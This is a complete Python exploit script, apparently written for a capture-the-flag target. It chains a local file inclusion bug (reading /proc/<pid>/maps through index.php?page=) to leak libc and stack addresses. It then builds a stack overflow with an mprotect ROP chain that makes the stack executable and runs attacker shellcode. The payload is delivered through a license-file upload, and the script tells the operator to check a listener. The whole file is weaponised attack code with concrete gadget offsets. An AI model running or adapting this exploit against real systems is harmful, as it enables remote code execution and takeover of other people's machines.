#!/usr/bin/env python3
import re
import requests
import struct
import sys
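ip = '10.10.11.154'  # target host; every URL below is built from this


def p64(n: int) -> bytes:
    """Pack *n* as a little-endian unsigned 64-bit value (an x86-64 pointer).

    Raises struct.error if *n* is negative or wider than 64 bits, so a bad
    address or gadget offset fails loudly here instead of silently corrupting
    the ROP chain.
    """
    return struct.pack('<Q', n)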
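def _parse_maps(maps_text: str) -> tuple[int, int, int]:
    """Pull the ELF, libc and stack base addresses out of /proc/<pid>/maps text.

    Every maps line begins with ``start-end`` in hex; for each region the first
    line whose path contains the expected string is used and its ``start``
    field is returned. The libc path is pinned to ``libc-2.31.so`` because the
    gadget offsets in craft_payload() only hold for that build.

    Raises:
        ValueError: if any of the three regions is absent (wrong PID, the
            process has exited, the page was not actually served, or the
            target runs a different libc).
    """
    wanted = (
        ('activate_license ELF', r'/usr/bin/activate_license'),
        ('libc-2.31', r'/usr/lib/x86_64-linux-gnu/libc-2\.31\.so'),
        ('[stack]', r'\[stack\]'),
    )
    bases = []
    for label, path_re in wanted:
        # ^ with MULTILINE anchors at a line start, so the capture is the
        # region's start address; [^\n]* keeps the match on a single line.
        m = re.search(rf'^([0-9a-fA-F]+)-[^\n]*{path_re}', maps_text, re.MULTILINE)
        if m is None:
            raise ValueError(f'{label} mapping not found in maps output')
        bases.append(int(m.group(1), 16))
    elf_base, glibc_base, stack_base = bases
    return elf_base, glibc_base, stack_base


def get_addresses(pid: str) -> tuple[int, int, int]:
    """Read /proc/<pid>/maps through the LFI and return (elf, libc, stack) bases.

    Uses the module-level ``ip`` target. Redirects are deliberately not
    followed: a login/redirect response would otherwise be parsed as if it
    were the maps file, and it is reported as a missing mapping instead.

    Raises:
        requests.HTTPError: on a 4xx/5xx response.
        ValueError: if the response lacks one of the expected regions.
    """
    r = requests.get(
        f'http://{ip}/index.php?page=/proc/{pid}/maps',
        allow_redirects=False,
        timeout=15,  # never hang the operator on a dead target
    )
    r.raise_for_status()
    return _parse_maps(r.text)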
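def _build_rop_chain(glibc_addr: int, stack_addr: int, shellcode: bytes, offset: int) -> bytes:
    """Build the overflow body: padding, an mprotect() ROP chain, then *shellcode*.

    The chain calls ``mprotect(stack_addr, 0x21000, PROT_READ|PROT_WRITE|PROT_EXEC)``
    and then runs ``push rsp; ret``, which transfers control to the bytes
    immediately after the chain -- the shellcode now sitting on an executable
    stack. mprotect() needs a page-aligned address; the start of a /proc maps
    region satisfies that. The 0x21000 length is assumed to cover the target's
    [stack] mapping -- TODO confirm against the leaked maps if the chain fails.

    All gadget and symbol offsets are specific to the libc-2.31 build that
    get_addresses() matches by path; recompute them for any other libc.
    """
    pop_rdi_ret = glibc_addr + 0x26796
    pop_rsi_ret = glibc_addr + 0x2890f
    pop_rdx_ret = glibc_addr + 0xcb1cd
    push_rsp_ret = glibc_addr + 0x3afc9
    mprotect_addr = glibc_addr + 0xf8c20
    chain = (
        p64(pop_rdi_ret), p64(stack_addr),   # rdi = address of the [stack] mapping
        p64(pop_rsi_ret), p64(0x21000),      # rsi = length to remap
        p64(pop_rdx_ret), p64(0b111),        # rdx = PROT_READ | PROT_WRITE | PROT_EXEC
        p64(mprotect_addr),                  # mprotect(); its ret lands on the next slot
        p64(push_rsp_ret),                   # push rsp; ret -> jump into the bytes below
    )
    return b'A' * offset + b''.join(chain) + shellcode


def craft_payload(pid, shellcode, *, offset=520):
    """Return the multipart ``files`` mapping carrying the overflow for *pid*.

    The process's memory layout is leaked via get_addresses() first, so the
    chain is built against the live libc and stack addresses (ASLR-aware).

    Args:
        pid: target process id, used to read /proc/<pid>/maps.
        shellcode: raw bytes executed once the stack is made executable.
        offset: filler bytes before the saved return address; the default of
            520 is the value for the target binary.

    Returns:
        ``{'licensefile': ('tmp_name', payload)}`` ready for ``requests.post(files=...)``.

    Raises:
        ValueError: if *shellcode* is empty (``push rsp; ret`` would return into
            nothing) or *offset* is negative.
    """
    if not shellcode:
        raise ValueError('shellcode must not be empty')
    if offset < 0:
        raise ValueError('offset must be non-negative')
    # The ELF base is leaked as well, but this chain only needs libc + stack.
    _elf_addr, glibc_addr, stack_addr = get_addresses(pid)
    payload = _build_rop_chain(glibc_addr, stack_addr, shellcode, offset)
    return {'licensefile': ('tmp_name', payload)}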
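def main() -> None:
    """CLI entry point: ``third_exploit.py <PID> <shellcode-file>``.

    Reads the shellcode file, builds the overflow for the given PID and uploads
    it to ``activate_license.php`` on the module-level ``ip`` target. Exits
    with status 2 on a usage error and 1 if the request cannot be delivered.
    An HTTP response only proves the upload was accepted; the listener is the
    real signal that the shellcode ran.
    """
    if len(sys.argv) != 3:
        print(f'[!] Usage: python3 {sys.argv[0]} <PID> <shellcode-file>', file=sys.stderr)
        sys.exit(2)
    pid, shellcode_file = sys.argv[1], sys.argv[2]
    # The PID is interpolated into a /proc/<pid>/maps path; refuse anything
    # that is not a plain integer so a typo cannot become a different LFI target.
    if not pid.isdigit():
        print(f'[!] PID must be a positive integer, got {pid!r}', file=sys.stderr)
        sys.exit(2)
    with open(shellcode_file, 'rb') as f:
        shellcode = f.read()
    try:
        r = requests.post(
            f'http://{ip}/activate_license.php',
            files=craft_payload(pid, shellcode),
            timeout=30,
        )
    except requests.ReadTimeout:
        # A hijacked worker often never answers: the connection was made and
        # the body sent, so the payload was most likely delivered.
        print('[*] No response before timeout; payload was probably delivered. Check listener')
        return
    except requests.RequestException as exc:
        print(f'[!] Upload failed: {exc}', file=sys.stderr)
        sys.exit(1)
    print(f'[*] Server answered HTTP {r.status_code}')
    print('[+] Sent payload. Check listener')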
# Run only when executed directly, so the helpers can be imported without
# firing the exploit.
if __name__ == '__main__':
    main()